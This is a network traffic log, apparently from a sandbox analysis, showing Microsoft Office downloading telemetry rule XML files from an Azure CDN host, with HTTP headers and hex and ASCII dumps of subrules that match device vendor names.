                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133927Z-15869dbbcc6b2ncxhC1DFW661800000001w0000000004auq
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            42192.168.2.54975313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:27 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                            x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133927Z-16547b76f7fm7xw6hC1DFW5px400000006m000000000cbgs
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            43192.168.2.54975113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:27 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                            x-ms-request-id: 65394723-101e-00a2-80f1-2c9f2e000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133927Z-16547b76f7fknvdnhC1DFWxnys00000006q000000000d2cn
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            44192.168.2.54976213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:28 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                            x-ms-request-id: 7b6e4e7e-601e-0050-245f-2e2c9c000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133928Z-17df447cdb5rrj6shC1DFW6qg400000002v00000000036ky
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            45192.168.2.54976313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:28 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                            x-ms-request-id: de083b16-101e-0079-14f1-2c5913000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133928Z-16547b76f7fq9mcrhC1DFWq15w00000006k000000000h959
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            46192.168.2.54976513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:28 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                            x-ms-request-id: 504dc720-801e-00a0-642f-2f2196000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133928Z-15869dbbcc6vr5dxhC1DFWqn6400000001a000000000c66s
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            47192.168.2.54976413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:28 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                            x-ms-request-id: 2e6eb393-601e-0097-4b00-2df33a000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133928Z-16547b76f7fr28cchC1DFWnuws00000006vg000000005d27
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:28 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            48192.168.2.54976813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:29 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                            x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133929Z-16547b76f7fj897nhC1DFWdwq400000006dg00000000h79e
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            49192.168.2.54976913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:29 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                            x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133929Z-16547b76f7f8dwtrhC1DFWd1zn00000006r000000000fgvx
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            50192.168.2.54977013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:29 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                            x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133929Z-16547b76f7f9rdn9hC1DFWfk7s00000006m000000000ehxw
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
